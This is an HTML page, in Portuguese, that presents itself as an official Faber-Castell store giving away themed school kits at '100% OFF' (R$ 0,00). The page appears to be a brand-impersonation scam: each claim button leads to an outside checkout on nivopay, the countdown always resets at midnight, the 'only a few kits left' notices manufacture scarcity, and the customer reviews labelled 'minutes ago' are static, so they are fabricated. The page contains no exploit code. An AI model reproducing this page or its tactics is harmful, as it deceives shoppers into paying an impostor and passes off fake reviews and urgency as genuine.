<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Loja Faber-Castell Oficial - Entrega para Todo Brasil.</title>
    <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link rel="stylesheet" href="css/bootstrap-icons.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
<script>
  window.pixelId = "678083402a59279098551b8c";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
  <style>
    body {
        font-family: "Montserrat", serif !important;
    }

    .topo {
        background-color: #d40e28;
        padding: 1rem 0rem;
    }

    .topo img {
        width: 200px;
    }

    @media (max-width: 575.98px) {
        .topo img {
            width: 30%;
        }
    }

    .topo i {
        color: white;
        font-size: 2rem;
    }

    .pesquisa {
        width: 50%;
        background-color: white;
        border-radius: .4rem;
        padding: .5rem;
        font-size: .8rem;
        position: relative;
    }

    .pesquisa i {
        color: black;
        font-size: 1rem;
        top: 0;
        right: 0;
    }

    .banner {
        margin: 0 auto;
        width: 1200px;
        max-width: 100%;
    }

    .banner img {
        width: 100%;
    }

    

    .box {
        padding: 1rem 0rem;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
    }


    .countdown {
        padding: .5rem 1rem;
        display: flex;
        justify-content: center;
        align-items: center;
        gap: 20px;
    }

    #days, #hours, #seconds, #minutes {
        width: 100%;
        font-size: 1.4rem;
        font-weight: 600;
        background-color: red;
        color: white;
        text-align: center;
        padding: 15px;
        border-radius: 5px;
        flex: 1;
    }

    .box span {
        font-size: 1rem;
        display: block;
    }

    .box p {
        margin: 0;
        font-size: 1rem;
    }

    .produtos {
        margin: 0 auto;
        width: 1200px;
        max-width: 100%;
        padding: .5rem;
    }

    .produto-one {
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        padding: .5rem;
        border: solid #e3e3e3 1px;
        border-radius: .5rem;
        width: 48%;
        position: relative;
    }

    .produto-one img {
        width: 100%;
    }

    

    .produto-one h1 {
        font-size: .8rem;
        line-height: 1.2em;
        margin: 0px;
        margin-top: .5rem;
    }

    .btn-comprar {
        width: 100%;
    }

    .btn-comprar a {
        width: 100%;
    }

    .btn-comprar button {
        margin-top: .6rem;
        width: 100%;
        background-color: #13c600;
        border: none;
        padding: .5rem 0rem;
        color: white;
        font-size: .8rem;
        font-weight: 600;
        border-radius: .4rem;
    }

    button.esgotado {
        opacity: 0.4;
    }

    @keyframes pulse {
        0% {
            transform: scale(1);
        }
        50% {
            transform: scale(1.1);
        }
        100% {
            transform: scale(1);
        }
    }

    .pulse {
    animation: pulse 1.5s infinite;
    }






    .desktop {
        display: block;
    }

    .mobile {
        display: none;
    }

    @media (max-width: 575.98px) {
        .desktop {
            display: none !important;
        }

        .mobile {
            display: block !important;
        } 
    }
  </style></head>


  
  <body>


        <div class="topo">
            <div class="container d-flex justify-content-between align-items-center">
                <i class="bi bi-list"></i>
                <div class="pesquisa d-flex justify-content-between align-items-center">
                    O que você procura?
                    <i class="bi bi-search"></i>
                </div>
                <img src="images/logo.png" alt="">
            </div>
        </div>

        <div class="banner d-flex justify-content-center align-items-center">
            <img class="desktop" src="images/banner-desktop.png" alt="">
            <img class="mobile" src="images/banner-mobile.png" alt="">
        </div>

        <div class="countdown">
            <div class="box">
            <span id="days">00</span>
            <p>Dias</p>
            </div>
            <div class="box">
            <span id="hours">00</span>
            <p>Horas</p>
            </div>
            <div class="box">
            <span id="minutes">00</span>
            <p>Minutos</p>
            </div>
            <div class="box">
            <span id="seconds">00</span>
            <p>Segundos</p>
            </div>
        </div>

        <style>
            .price {
            }

            .price span {
                background-color: #2d5a35;
                color: white;
                padding: 0rem .5rem;
                font-size: .7rem;
                border-radius: .3rem;
                margin-left: .4rem;
                display: flex;
                justify-content: center;
                align-items: center;
            }

            .price h1 {
                font-size: .8rem;
                line-height: 1em;
                margin: 0px;
                margin-top: .5rem;
                text-decoration: line-through;
            }

            .price h2 {
                color: red;
                font-size: 1.3rem;
                font-weight: 700;
                line-height: 1em;
                margin: 0px;
                margin-top: .5rem;
            }

            .price h3 {
                font-size: .7rem;
                font-weight: 500;
                margin: 0px;
                margin-top: .5rem;
            }

            .stars-price {
                margin: .5rem 0rem;
                font-size: .8rem;
                
            }

            .stars-price i {
                color: #fab737;
                font-size: .8rem;
                margin-right: .2rem;
            }

            .produto-one a {
                text-decoration: none;
                color: black;
            }
        </style>

        <div class="produtos d-flex justify-content-between aling-items-center">
            
            <div class="produto-one">
                <a href="https://app.nivopay.com.br/checkout/38c2433f-aa1e-4fbe-9f13-845d52f5b8ac">
                    <img src="images/produto-1.webp" alt="">
                    <h1>Kit Escolar Masculino, 1 Bolsa, 1 Caderno, 1 Estojo, 1 Caixa de lápis de cor, 3 Lápis, 3 Canetas, 1 Régua, 1 Apontador e 1 Borracha</h1>
                    <div class="price">
                            <div class="stars-price d-flex">
                                <div class="d-flex">
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                </div>
                                (1870)
                            </div>
                            <div class="d-flex">
                                <h1>R$ 655,00</h1> <span>100% OFF</span>
                            </div>
                            <h2>R$ 0,00</h2>
                            <h3>*Restam somente 4 kits</h3>
                    </div>
                    </a><div class="btn-comprar"><a href="https://app.nivopay.com.br/checkout/38c2433f-aa1e-4fbe-9f13-845d52f5b8ac">
                        </a><a href="https://app.nivopay.com.br/checkout/38c2433f-aa1e-4fbe-9f13-845d52f5b8ac"><button class="pulse">RESGATAR AGORA</button></a>
                    </div>
                
            </div>

            <div class="produto-one">
                <a href="https://app.nivopay.com.br/checkout/993f4edc-75c4-41c3-bb2d-a80c9b02fc48">
                    <img src="images/produto-2.png" alt="">
                    <h1>Kit Escolar Feminino, 1 Bolsa, 1 Caderno, 1 Estojo, 1 Caixa de lápis de cor, 3 Lápis, 3 Canetas, 1 Régua, 1 Apontador e 1 Borracha</h1>
                    <div class="price">
                            <div class="stars-price d-flex">
                                <div class="d-flex">
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                </div>
                                (1239)
                            </div>
                            <div class="d-flex">
                                <h1>R$ 655,00</h1> <span>100% OFF</span>
                            </div>
                            <h2>R$ 0,00</h2>
                            <h3>*Restam somente 3 kits</h3>
                    </div>
                    </a><div class="btn-comprar"><a href="https://app.nivopay.com.br/checkout/993f4edc-75c4-41c3-bb2d-a80c9b02fc48">
                    </a><a href="https://app.nivopay.com.br/checkout/993f4edc-75c4-41c3-bb2d-a80c9b02fc48"><button class="pulse">RESGATAR AGORA</button></a>
                    </div>
                
            </div>
        </div>

        <div class="produtos d-flex justify-content-between aling-items-center">
            <div class="produto-one">
                <a href="https://app.nivopay.com.br/checkout/0f4ee505-ecd0-4227-81e6-c3eaa942ae33">
                    <img src="images/produto-3.jpg" alt="">
                    <h1>Kit Escolar Homem-Aranha, 1 Bolsa, 1 Caderno, 1 Estojo, 1 Caixa de lápis de cor, 3 Lápis, 3 Canetas, 1 Régua, 1 Apontador e 1 Borracha</h1>
                    <div class="price">
                            <div class="stars-price d-flex">
                                <div class="d-flex">
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                </div>
                                (1198)
                            </div>
                            <div class="d-flex">
                                <h1>R$ 655,00</h1> <span>100% OFF</span>
                            </div>
                            <h2>R$ 0,00</h2>
                            <h3>*Restam somente 5 kits</h3>
                    </div>
                    </a><div class="btn-comprar"><a href="https://app.nivopay.com.br/checkout/0f4ee505-ecd0-4227-81e6-c3eaa942ae33">
                        </a><a href="https://app.nivopay.com.br/checkout/0f4ee505-ecd0-4227-81e6-c3eaa942ae33"><button class="pulse">RESGATAR AGORA</button></a>
                    </div>
                
            </div>

            <div class="produto-one">
                <a href="https://app.nivopay.com.br/checkout/28310b4b-8829-4653-9ad1-506644a92317">
                    <img src="images/produto-4.jpg" alt="">
                    <h1>Kit Escolar Sonic, 1 Bolsa, 1 Caderno, 1 Estojo, 1 Caixa de lápis de cor, 3 Lápis, 3 Canetas, 1 Régua, 1 Apontador e 1 Borracha</h1>
                    <div class="price">
                            <div class="stars-price d-flex">
                                <div class="d-flex">
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                </div>
                                (1287)
                            </div>
                            <div class="d-flex">
                                <h1>R$ 655,00</h1> <span>100% OFF</span>
                            </div>
                            <h2>R$ 0,00</h2>
                            <h3>*Restam somente 2 kits</h3>
                    </div>
                    </a><div class="btn-comprar"><a href="https://app.nivopay.com.br/checkout/28310b4b-8829-4653-9ad1-506644a92317">
                    </a><a href="https://app.nivopay.com.br/checkout/28310b4b-8829-4653-9ad1-506644a92317"><button class="pulse">RESGATAR AGORA</button></a>
                    </div>
                
            </div>
        </div>

        <div class="produtos d-flex justify-content-between aling-items-center">
            <div class="produto-one">
                <a href="https://app.nivopay.com.br/checkout/09d0789c-83bf-47c9-a689-dcf923d0ce9e">
                    <img src="images/produto-5.jpg" alt="">
                    <h1>Kit Escolar Mulher Maravilha, 1 Bolsa, 1 Caderno, 1 Estojo, 1 Caixa de lápis de cor, 3 Lápis, 3 Canetas, 1 Régua, 1 Apontador e 1 Borracha</h1>
                    <div class="price">
                            <div class="stars-price d-flex">
                                <div class="d-flex">
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                </div>
                                (1003)
                            </div>
                            <div class="d-flex">
                                <h1>R$ 655,00</h1> <span>100% OFF</span>
                            </div>
                            <h2>R$ 0,00</h2>
                            <h3>*Restam somente 3 kits</h3>
                    </div>
                    </a><div class="btn-comprar"><a href="https://app.nivopay.com.br/checkout/09d0789c-83bf-47c9-a689-dcf923d0ce9e">
                        </a><a href="https://app.nivopay.com.br/checkout/09d0789c-83bf-47c9-a689-dcf923d0ce9e"><button class="pulse">RESGATAR AGORA</button></a>
                    </div>
                
            </div>

            <div class="produto-one">
                <a href="https://app.nivopay.com.br/checkout/7b83838a-5bdf-4815-a597-266b7f7a345d">
                    <img src="images/produto-6.jpg" alt="">
                    <h1>Kit Escolar Moana, 1 Bolsa, 1 Caderno, 1 Estojo, 1 Caixa de lápis de cor, 3 Lápis, 3 Canetas, 1 Régua, 1 Apontador e 1 Borracha</h1>
                    <div class="price">
                            <div class="stars-price d-flex">
                                <div class="d-flex">
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                    <i class="bi bi-star-fill"></i>
                                </div>
                                (1290)
                            </div>
                            <div class="d-flex">
                                <h1>R$ 655,00</h1> <span>100% OFF</span>
                            </div>
                            <h2>R$ 0,00</h2>
                            <h3>*Restam somente 2 kits</h3>
                    </div>
                    </a><div class="btn-comprar"><a href="https://app.nivopay.com.br/checkout/7b83838a-5bdf-4815-a597-266b7f7a345d">
                    </a><a href="https://app.nivopay.com.br/checkout/7b83838a-5bdf-4815-a597-266b7f7a345d"><button class="pulse">RESGATAR AGORA</button></a>
                    </div>
                
            </div>
        </div>

        <div class="produtos d-flex justify-content-between aling-items-center">
            <div class="produto-one">
                
                <img src="images/produto-7.png" alt="">
                <h1>Kit Miraculous, 1 Bolsa, 1 Lancheira, 1 Guarda chuva, 1 estojo, 1 Caixa Lápis de cor, 1 Garrafa, 3 Lápis, 3 Caneta, 1 Caderno, Borracha e Apontador</h1>
                <div class="price">
                        <div class="stars-price d-flex">
                            <div class="d-flex">
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                            </div>
                            (1120)
                        </div>
                        <div class="d-flex">
                            <h1>R$ 655,00</h1> <span>100% OFF</span>
                        </div>
                        <h2>R$ 0,00</h2>
                </div>
                <div class="btn-comprar">
                    <button class="esgotado">ESGOTADO</button>
                </div>
            </div>

            <div class="produto-one">
                
                <img src="images/produto-8.png" alt="">
                <h1>Kit Patrulha Canina, 1 Bolsa, 1 Lancheira, 1 Caixa Lápis de cor, 1 Garrafa, 3 Lápis, 3 Caneta, 1 Caderno, Borracha e Apontador</h1>
                <div class="price">
                        <div class="stars-price d-flex">
                            <div class="d-flex">
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                                <i class="bi bi-star-fill"></i>
                            </div>
                            (1320)
                        </div>
                        <div class="d-flex">
                            <h1>R$ 655,00</h1> <span>100% OFF</span>
                        </div>
                        <h2>R$ 0,00</h2>
                </div>
                <div class="btn-comprar">
                     <button class="esgotado">ESGOTADO</button>
                </div>
            </div>
        </div>
        
        <style>
            .avaliacoes {
                margin: 0 auto;
                margin-top: 2rem;
                padding: 2rem 1rem;
                width: 1200px;
                max-width: 100%;
            }

            .avaliacoes h1 {
                font-size: 1.6rem;
                font-weight: 600;
                line-height: 1em;
            }


            .stars {
                margin-left: .4rem;
            }

            .stars i {
                color: #fab737;
            }

            .avaliacao-one {
                display: flex;
                flex-direction: column;
                justify-content: space-between;
                padding: .8rem .5rem;
                border: solid #e3e3e3 1px;
                border-radius: .5rem;
                width: 48%;
                position: relative;
                margin-bottom: 1rem;
            }

            @media (max-width: 575.98px) {
                .avaliacao-one {
                    width: 100%;
                }
            }

            .avaliacao-one h1 {
                font-size: 1rem;
                font-weight: 600;
                line-height: 1em;
            }


            .avaliacao-one h2 {
                font-size: .9rem;
                font-weight: 400;
                line-height: 1em;
            }

            .avaliacao-one h3 {
                font-size: .9rem;
                font-weight: 400;
                line-height: 1em;
                margin-top: .4rem;
            }

            .avaliacao-one img {
                width: 100%;
            }
        </style>

        <div class="avaliacoes d-flex flex-column justify-content-center align-items-center">
            <h1>Avaliações</h1>

            <div class="d-flex justify-content-center align-items-center">
                <h1>4.9</h1>
                <div class="stars d-flex justify-content-center align-items-center">
                    <i class="bi bi-star-fill"></i>
                    <i class="bi bi-star-fill"></i>
                    <i class="bi bi-star-fill"></i>
                    <i class="bi bi-star-fill"></i>
                    <i class="bi bi-star-fill"></i>
                </div>
            </div>

            <br>

            <div class="avaliacao-one">
                <h1>@marianalopes21</h1>
                <h2>Ganhei 50% de desconto e amei a qualidade, chegou tudo certo conforme que eu pedi , veio muito bem embalado, e a entrega foi mega rápida . Eu ameiii!❤️</h2>
                <img src="images/aval-1.png" alt="">
                <h3>Hoje - há 3 min.</h3>
            </div>

            <div class="avaliacao-one">
                <h1>@luanamaria_</h1>
                <h2>Simplesmente perfeito. Minha filha amou. Super recomendo. Lápis para profissionais. Chegou bem embalado e antes da data prevista de entrega. Obrigada Faber castell por realizar sonhos.</h2>
                <img src="images/aval-3.png" alt="">
                <h3>Hoje - há 8 min.</h3>
            </div>

            <div class="avaliacao-one">
                <h1>@alves_fernanda12</h1>
                <h2>Adorei a cor, coube tudo no estojo, chegou bem rápido, bem a tempo da volta aulas 😅, Super recomendo!</h2>
                <img src="images/aval-2.png" alt="">
                <h3>Hoje - há 5 min.</h3>
            </div>

            <div class="avaliacao-one">
                <h1>@sofiabezerrafrnds_</h1>
                <h2>Fiquei com o pé atrás, mas é a Faber castelo né? Fui lá e fiz o pedido, 5 dias depois o correio chega aqui em casa com meu kit. PASSADAAAA!!</h2>
                <img src="images/aval-4.png" alt="">
                <h3>Hoje - há 13 min.</h3>
            </div>

            <div class="avaliacao-one">
                <h1>@lauandandrade__</h1>
                <h2>chegou antes do prazo! a mochila veio separada no meu, amei muito!! otimo para economizar nesse volta as aula ganhei 100% de desconto foi otimo!</h2>
                <img src="images/aval-5.png" alt="">
                <h3>Hoje - há 19 min.</h3>
            </div>
        </div>



        <script type="c36a8d385844ef1da01080ac-text/javascript">
            function updateCountdown() {
            const now = new Date();
            const nextMidnight = new Date();
            nextMidnight.setHours(24, 0, 0, 0); // Próxima meia-noite

            const diff = nextMidnight - now;

            const days = Math.floor(diff / (1000 * 60 * 60 * 24));
            const hours = Math.floor((diff % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
            const minutes = Math.floor((diff % (1000 * 60 * 60)) / (1000 * 60));
            const seconds = Math.floor((diff % (1000 * 60)) / 1000);

            document.getElementById("days").textContent = String(days).padStart(2, "0");
            document.getElementById("hours").textContent = String(hours).padStart(2, "0");
            document.getElementById("minutes").textContent = String(minutes).padStart(2, "0");
            document.getElementById("seconds").textContent = String(seconds).padStart(2, "0");
            }

            // Atualiza o contador a cada segundo
            setInterval(updateCountdown, 1000);

            // Inicializa o contador
            updateCountdown();
        </script>



    <script src="js/bootstrap.bundle.min.js" crossorigin="anonymous" type="c36a8d385844ef1da01080ac-text/javascript"></script>
  <script src="js/rocket-loader.min.js" data-cf-settings="c36a8d385844ef1da01080ac-|49" defer=""></script>
</body></html>
